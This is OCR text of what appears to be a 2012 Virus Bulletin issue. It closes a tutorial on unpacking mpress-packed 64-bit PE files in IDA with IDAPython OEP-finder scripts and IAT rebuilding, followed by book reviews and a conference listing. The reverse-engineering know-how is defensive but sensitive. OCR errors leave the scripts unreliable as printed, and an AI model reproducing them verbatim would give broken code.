GetDebuggerEvent(WFNE_SUSP, -1) 

EnableTracing(TRACE_STEP, 1) 

code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1) 

if code: 

while code > 0: 

if GetEventEaO < start_addr: 
break 

code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT,-1) 
PauseProcess() 

GetDebuggerEvent(WFNE_SUSP, -1) 

EnableTracing(TRACE_STEP, 0) 

MakeCode(GetEventEa()) 

TakeMemorySnapshot(1) 


Listing 1: Generic, simple OEP finder based on [3]. 

The following is a brief description of the functions used: 

• BeginEA() returns the address of the entry point 
identified by IDA during automatic analysis or the entry 
point address entered manually by the user. 

• RunTo() runs the process under selected debugger 
control and breaks at the specified address. 


SCRIPTING THE UNPACKING PROCESS 

While trace replayer adds some automation to our unpacking 
process it still requires some manual interaction. This is 


GetDebuggerEvent() takes two arguments: WFNE_* 
constants and timeout value. If the timeout value is 
set to -1 it means infinity, while any other number 
defines the number of seconds to wait. It is crucial to 
understand that GetDebuggerEventQ must be called 
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after every execution break. The list of WFNE_* 
constants can be found in the IDA help file. The flags 
we are using: WFNE_ANY I WFNE_CONT mean 
that any first debugging event will be returned to our 
script (even if it does not suspend the debugged process 
execution) and continuation should be resumed from 
the suspended state. The WFNE_SUSP means that the 
script should wait until the process is suspended. 

• PauseProcess() suspends the running process under 
debugger control. 

• EnableTracing() enables debugger step tracing according 
to the trace_level value which is the first argument. 
TRACE_STEP (the lowest level trace - records all 
instructions), TRACE_INSN (records instruction trace) 
and TRACE_FUNC (records calls and rets) are possible 
options. The second argument, called enable, can have 
one of two values: 0 = turn off; 1 = turn on. 

• MakeCode() instructs IDA to treat the byte stream as 
code at the location pointed to by the argument. 

• TakeMemorySnapshot) takes a memory snapshot of the 
debugged process, meaning that debugger disassembly 
is transferred into the IDA database. This enables the 
results of dynamic analysis to be stored in a static 
disassembly produced by IDA at start-up. 

Unfortunately, the example script will fail on our sample 
file since the original code is above and not below the 
decompression loop. However, it contains almost all the 
pieces necessary to build a working solution (remember 
always learn from your failures). 

If you go back to the WinDbg discussion [2] you will find 
a method based on setting hardware breakpoints on the 
stack pointer at the beginning of the decompression code, 
which happens to be the entry point in our case. The same 
approach can be used with IDA , and thanks to the IDC/ 
IDAPython interfaces it can quite easily be automated. First 
- as an exercise - try to unpack our target file manually. The 
local Bochs debugger is perfect for the job. Launch it and 
enable a break at the entry point option. Next, step over one 
instruction and set up a hardware breakpoint just as shown 
in Figure 10. Now run the process again (F9) and wait until 
the breakpoint is hit. The result should be the same as that 
acquired with WinDbg. Now we can write a script that 
simulates our manual actions. 

Looking at listing 2, most of the functions used have been 
discussed already. Here are a couple of new ones: 

• SegName() returns the segment name of an address - as 
discussed in the first part of this tutorial segments are 
not PE sections but can mimic them in a way. From 
IDA's perspective a segment is a logical unit used to 
identify and separate different areas of a loaded file. 


• StepInto() executes one step in the debugger. 

• cpu.Rsp gives us access to the RSP register value. 

• AddBptEx() allows us to add hardware breakpoints. 

• ScreenEA() returns the linear address of the cursor - in 
our case the cursor is being set at the correct place by 
the script. 

After the hardware breakpoint is hit we take four StepOver() 
function calls until the current address is lower or greater 
than the current one by 0x100. This value is an arbitrary 
guess based on the idea that inside the decompression loop 
you can have RIP changing instructions like conditional 


entry_addr = BeginEAO 
entry_seg = SegName(entry_addr) 

print '[*] Entry point: %s:%X' % (entry_seg,entry_addr) 
RunTo(entry_addr) 

GetDebuggerEvent(WFNE_SUSP, -1) #page 533 
Steplnto() 

GetDebuggerEvent(WFNE_SUSP, -1) 

_rsp = cpu.Rsp 

AddBptEx(_rsp, 0x8, BPT_RDWR) 

code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1) 

GetDebuggerEvent(WFNE_SUSP, -1) 

curr_addr = ScreenEA() 

bOk = False 
i = 0 

while i < 4: 

Steplnto() 

if curr_addr > ScreenEA() + 0x100: 
bOk = True 
break 

if curr_addr < ScreenEA() - 0x100: 

bOk = True 
break 

GetDebuggerEvent(WFNE_SUSP, -1) 

i + = l 

if bOk: 

_addr = ScreenEA() 

_seg = SegName(_addr) 

print '[*] Entry point found: %s,%X' % (_seg, _addr) 
TakeMemorySnapshot(1) 
else: 

print ' [*] Failed to find entry point' 


Listing 2: IDAPython script - stack hardware breakpoint 
generic unpacker. 
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jumps or calls to subroutines but none of them should be 
located far away from the caller. A bigger change of RIP 
value suggests the presence of the original entry point. 
Obviously, the 0x100 value can be changed. If the RIP value 
hasn’t changed during four iterations then scripts decide it 
failed in finding the OEP Obviously the iteration number in 
the while loop can be changed too. 

Note that after every StepInto() function call there is a 
companion GetDebuggerEvent call. Otherwise neither 
the StepInto() nor the StepOver() function would work 
properly. This means that the following code is invalid: 

StepOver() 

StepOver() 

StepOver() 

While this code will work correctly: 


StepOver() 


GetDebuggerEvent([. 

. .] ) 

StepOver() 


GetDebuggerEvent([. 

. .] ) 

StepOver() 


GetDebuggerEvent([. 

. .] ) 


UUNP PLUG-IN ONCE AGAIN 

Since version 4.9, IDA has come with a Universal PE 
Unpacker plug-in, but it can’t handle our test file. Newer 
plug-ins (which can be used from IDA version 6.2 onwards 
with Bochs and 64-bit PEs) aid the unpacking process for PE 
files in uunp: Universal Unpacker Manual Reconstruct. This 
plug-in has already been mentioned in [1]. Now, when several 
different approaches to finding the OEP have been discussed, 



we can feed uunp with all the required data. The one thing 
uunp is helpful with and that we haven’t really discussed yet 
is the Import Address Table (IAT) rebuilding process. If the 
original IAT is large this could be quite a tedious process, 
hence automating it with a plug-in is a very attractive option. 
Since IDA is capable of detecting broken or obfuscated IATs 
it will not convert Windows API calls to meaningful names 
like call GetModuleHandleA but disassembly will contain 
code, for example, like this: call cs:off_40304C. 

In order to benefit from uunp we first need to find the OEP, 
but at this point it should not be a challenge. Next we need 
to gather some of the addresses uunp requires before it can 
work correctly. The tricky part is that if you get some data 
wrong you might not detect the error until several hours 
after analysing the unpacked code. 

Now choose whichever method suits you best and find the 
correct address. In our case the original entry point address 
is 0x402000. This also happens to be the start of our source 
code so we can already supply two uunp input fields with 
the correct data (see Figure 11). The next field is ‘Code end 
address’ - if you can’t get it from the unpacking loop then 
treat that as your homework. For now you can cheat a bit 
and load the original, unpacked test file into IDA and get 
this data from the ‘Segments’ view option. 

Next we need the IAT start and end addresses. Obviously, 
IAT requires the result of the GetProcAddress function. If 
you analyse the depacking loop closely you can see that 
GetProcAddress is being called at address .MPRESS 1:0000 
000000401152. Insert a breakpoint on the instruction before 
the GetProcAddress call (.MPRESS 1:000000000040114F 
mov rex, rbx) and run the process. When the breakpoint is 
hit, note the RDI register value. This is our starting address. 
Run the code again and after the last call to GetProcAddress 
execute the stosq instruction: 


.MPRESSl:000000000040114F 
; CODE XREF: 


loc_40114F: 

.MPRESSl:000000000040114lj 


.MPRESSl:000000000040114F mov rex, rbx 

; hModule 


.MPRESSl:0000000000401152 call GetProcAddress 


.MPRESSl:0000000000401157 stosq 


^ Reconstruction parameters 


Original entrypoint 0x402000 
Code start address 0x402000 
Code end address 0x403000 


IAT start address 0x40303C 
IAT end address 0xfW3054 


OK [ Cancel 


Figure 10: Hardware breakpoint at the stack pointer. 


Figure 11: Uunp data for our test file. 
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.MPRESS1:0000000000401200 

align 

10OOh 



.MPRESS1:0000000000402000 

sub 

rsp. 

28h 


.HPRESS1:0000000000402004 

nou 

r9d. 

0 


.MPRESS1:000000000040200ft 

mou 

r8, 

401000h 


.MPRESS1:0000000000402011 

mou 

rdx. 

40100Eh 


.MPRESS1:0000000000402018 

xor 

rex. 

rex 


.MPRESS1:000000000040201B 

call 

cs:off 40304C 


.MPRESS1:0000000000402021 

mou 

ecx, 

eax 


.MPRESS1:0000000000402023 

call 

cs:off_40303C 


Figure 12: Original code disassembly from test file before running the uunp plug-in. 




-MPRESS1:0000000000402000 | 

-MPRESS1:0O00000000402000 
-MPRESS1:0000000000402000 start 


.MPRESS1:0000000000402004 
.MPRESS1:000000000040200R 
.MPRESS1:00000000O0402011 
.MPRESS1:0000000000402018 
.MPRESS1:000000000040201B 
.MPRESS1:0000000O00402021 
-MPRESS110000000000402023 
.MPRESS1:00000000O0402023 start 


public start 

proc near CODE XREF MPRESS1 


mou r9d, 0 ; uType 

mou r8, offset Caption ; lpCaption 

idou rdx, (offset Caption+QEh) ; lpText 

xor rex, rex ; hUnd 

call cs:MessageBoxfi_0 

nou ecx, eax ; uExitCode 

call cs:ExitProcess 

endp 


Figure 13: Original code disassembly from test file after running the uunp plug-in. 


Now note the RDI register value. This will be the IAT end 
address we are looking for. Now you can place a breakpoint 
at the original entry point (at 0x040200) and resume process 
execution. When the breakpoint at the OEP is hit, invoke 
uunp from the ‘Edit->Plug-ins-> Universal Unpacker 
Manual Reconstruct’ option and enter the data as shown 
in Figure 11. This should result in a fixed IAT and a more 
readable disassembly of our unpacked code as shown in 
Figure 13; Figure 12 contains the original unpacked code 
prior to running uunp. 

FINAL IDA TIPS 

1. IDA has the option to be run with a temporary 
database instead of creating a normal database. This 
can be achieved with the -t option. A temporary 
database might be useful when unpacking a file with 
a debugger in several attempts, for example. 

2. IDA has very limited undo functionality - this means 
that if you break something you might not be able 

to quickly return it to the previous state. This is why 
database snapshot functionality is so handy: use 
it during manual analysis and unpacking! On the 
other hand, temporary databases are a nice feature 
when you want the final database to be free from 
any middle stages and mistakes you’ve made during 
initial attempts. 

3. The TakeMemorySnapshot() function is available 
from IDAPython, so according to the previous tips, 
use it! 

4. Do not forget to apply FFIRT signatures to 
uncompressed/deobfuscated code areas as it can aid 
further analysis enormously. Fet IDA do the dirty 
work. 


5. When stopping debugger execution from script do not 
forget to call GetDebuggerEvent() before the next call. 

6. Source code for uunp and the Universal PE Unpacker 
plug-in is available in the IDA SDK so you can peek 
into the internals of them both. This can be helpful 
when designing your own solution. 

SUMMARY 

While unpacking and IAT rebuilding techniques do not 
differ much in general between PE and PE32+ files, the 
publicly available toolset is still lacking behind x64 files. 
Some 32-bit tools including scripts and plug-ins might not 
work against x64 compression/obfuscation utilities, however 
the background in unpacking 32-bit executables is more 
than helpful when unpacking 64-bit modules. The solutions 
and methods presented in this tutorial series aimed to show 
a broad spectrum of the problem and provide ready-to-use 
tools in order to enable solving of more complex issues by 
introducing solid foundations. Remember that mpress does 
not obfuscate code - it just compresses it - and it does not 
contain any anti-debugging/anti-disassembly tricks. This is 
an ideal situation that does not happen every time in the case 
of malware analysis. You can also count on the appearance 
of a new set of anti-debugging tricks for x64 platforms 
- but, by now, you should be well prepared to battle those. 
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TROJAN HORSE & OPERATION 
DESOLATION 

Paul Baccas 
Sophos, UK 

■ Author: Mark Russinovich 

Publisher: Thomas Dunne Books 
ISBN-13: 978-1250010483 

This book is set throughout North 
America, Europe, the Near East and 
China over eight days in April (in the 
present). As in the author’s previous 
novel, Zero Day , each chapter starts with a memo or a news 
article setting the scene or laying a thread for later in the 
book. We begin with power outages in an operating room 
and a malfunction on a train line for unknown reasons 
which set the scene for the story to come. 

Next, we find ourselves in a UN bureaucrat’s office 
in Geneva, where said bureaucrat is wondering how a 
document he emailed to a colleague in the UK government 
had arrived containing errors that didn’t exist before he sent 
it. The document contained information about Iran’s nuclear 
program, and the original had concluded that the Iranians 
were near completion in the program. However, the ‘new’ 
document suggested that this was not the case - and was full 
of other errors as well (shades of Wazzu). Meanwhile, the 
recipient, in the UK Foreign Office, remembers that when 
he opened the file, it crashed ‘ OfficeWorks’ - and so begins 
a tale that drags Jeff Aiken (ex-CIA) and Daryl Haugen 
(formerly NS A) to London, Geneva, Prague and Turkey. 

The book describes the fictional ‘ Office Works’ as ‘the most 
commonly used word-processing program in the world 
... [and in its current version] as bug-free as anything 
anywhere’. If Russinovich’s day job wasn’t at Microsoft 
I wonder whether he would have bothered to invent such 
a program. Elsewhere he refers to ‘a special version of 
[a] debugger obtained from friends at Microsoft ’. Having 
spent a significant part of the past year dealing with threats 
leveraging MS Office formats to exploit Windows I find it 
jarring that the author wasn’t honest in naming the program, 
but it’s likely that my disappointment will only be shared by 
others in the security industry. 

The descriptions of the infection vectors are not wholly 
realistic, but not unrealistic either. The technical details in 
tech-thrillers are often quite implausible - but the author has 
worked hard to make his more accurate, or at least plausible. 

The book’s heroes, who are analysts, make believable 
mistakes: putting themselves in the firing line, not checking 


in with colleagues, and so on - the sort of mistakes that 
people who bear the knowledge they do (of an Android 
exploit that is being weaponized by a US government 
agency) really ought not to make. Such things make the 
story more believable and draw the reader in. 

The website http://www.trojanhorsethebook.com/ hosts 
a well executed video introduction to the book. When I 
reviewed Zero Day (see VB , May 2011, p. 16) I indicated that 
the story was quite filmic and Trojan Horse certainly also 
has those qualities. Russinovich himself has talked about 
potential lead actors for a Hollywood version of the story 
and I wonder if he can be persuaded to allow those of us on 
the frontline of the fight against malware to be the extras! 

My major complaint about what is a great thriller is the 
forward by the convicted hacker Kevin Mitnick - in my 
opinion, giving media oxygen to this self-promoted expert is 
a mistake. However, any other complaints I have are minor, 
and they did not detract from my enjoyment of the book. 

Mark Russinovich is becoming increasingly accomplished 
at writing fiction and if you enjoyed Zero Day then you will 
enjoy Trojan Horse. The book is fast-paced and would even 
make a long haul flight seem like a short hop. 

OPERATION DESOLATION 

Title: Operation Desolation: The Case of the Anonymous 

Bank Defacement 

Author: Mark Russinovich 

Publisher: Thomas Dunne Books 

ASIN: B0080K37P2 

This short story is set in Las Vegas at ‘CyberCon’, a 
conference hosted by a fictional security training and 
consulting company and sponsored by a major Department 
of Defense contractor. We see the return of the hero of Zero 
Day , the cyber maven Jeff Aiken, with passing appearances 
from Daryl Haugen. In the story, Daryl has left her job 
at the National Security Agency and joined Jeff in a 
professional and personal partnership. The events take place 
in the two-year period between Zero Day and Trojan Horse. 

The story attempts to tackle a number of newsworthy 
issues: the banking crisis, hacktivism and the Anonymous 
group. The issues are covered in rather broad brush strokes 
- and if we believe that the author has followed the tip 
‘write about what you know’, one might conclude that he 
had been burned in the banking crisis. 

A nice touch is that there is a teaser in this story for Trojan 
Horse , in that there is mention of the Android vulnerability 
that is crucial to its plot. 

Operation Desolation is another dynamic and engaging 
story - once started, it is hard to put down. 
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END NOTES & NEWS 


RSA Conference Europe takes place 9-11 October 2012 in 
London, UK. For registration and more details see. 
http://www.rsaconference.com/events/2012/europe/. 

Ruxcon takes place 20-21 October 2012 in Melbourne, Australia. 

For details see http://www.ruxcon.org.au/. 

eCrime 2012 will be held 22-25 October 2012 in Las Croabas, 
Puerto Rico, consisting of the APWG annual General Members 
Meeting and the eCrime Researchers Summit VII. The eCrime 
Researchers Summit will discuss all aspects of electronic crime and 
ways to combat it. For details see http://apwg.org/events/events.html. 

ISSE 2012 will take place 23-24 October 2012 in Brussels, 
Belgium. The event is designed to educate and inform on the latest 
developments in technology, solutions, market trends and best 
practice. See http://www.isse.eu.com/. 

Hacker Halted USA will take place 25-31 October 2012 in 
Miami, EL, USA. http://www.hackerhalted.com/. 

AVAR 2012 will be held 12-14 November 2012 in Hang Zhou, 
China. For details see http://www.aavar.org/avar2012/. 

Oil and Gas Cyber Security takes place 14-15 November 2012 
in London, UK. The conference will bring together information 
security researchers and technical experts from oil and gas companies 
to discuss the steps being taken to reduce the risk of cyber attacks, 
lessons learnt from previous incidents and best practice for the future. 
See http://www.smi-online.co.uk/energy/uk/oil-gas-cyber-security. 

SOURCE Barcelona 2012 takes place 16-17 November 2012 in 
Barcelona, Spain. For details see http://www.sourceconference.com/ 
barcelona/. 

TakeDownCon Las Vegas is scheduled to take place 1-6 
December 2012 in Las Vegas, NV, USA. Interest can be registered 
at http://www.takedowncon.com/Events/LasVegas.aspx. 

Black Hat Abu Dhabi takes place 10-13 December 2012 in Abu 
Dhabi. Registration for the event is now open. For full details see 
http://www.blackhat.com/. 

FloCon 2013 takes place in Albuquerque, NM, USA, 7-10 
January 2013. For information see http://www.cert.org/flocon/. 

RSA Conference 2013 will be held 25 February to 1 March 2013 
in San Francisco, CA, USA. Registration opens mid-September. For 
details see http://www.rsaconference.com/events/2013/usa/. 

Black Hat Europe takes place 12-15 March 2013 in Amsterdam, 
The Netherlands. For details see http://www.blackhat.com/. 

The 11th Iberoamerican Seminar on Security in Information 
Technology will be held 22-28 March 2013 in Havana, Cuba as 

part of the the 15th International Convention and Fair. For details see 
http://www.informaticahabana.com/. 

Infosecurity Europe will be held 23-25 April 2013 in London, UK. 

For details see http://www.infosec.co.uk/. 

NISC13 will be held 12-14 June 2013. For more information see 
http://www.nisc.org.uk/. 

VB2013 will take place 2-4 October 2013 in Berlin, Germany. 

Details will be revealed in due course at http://www.virusbtn.com/ 
conference/vb2013/. In the meantime, please address any queries to 
conference@virusbtn.com. 
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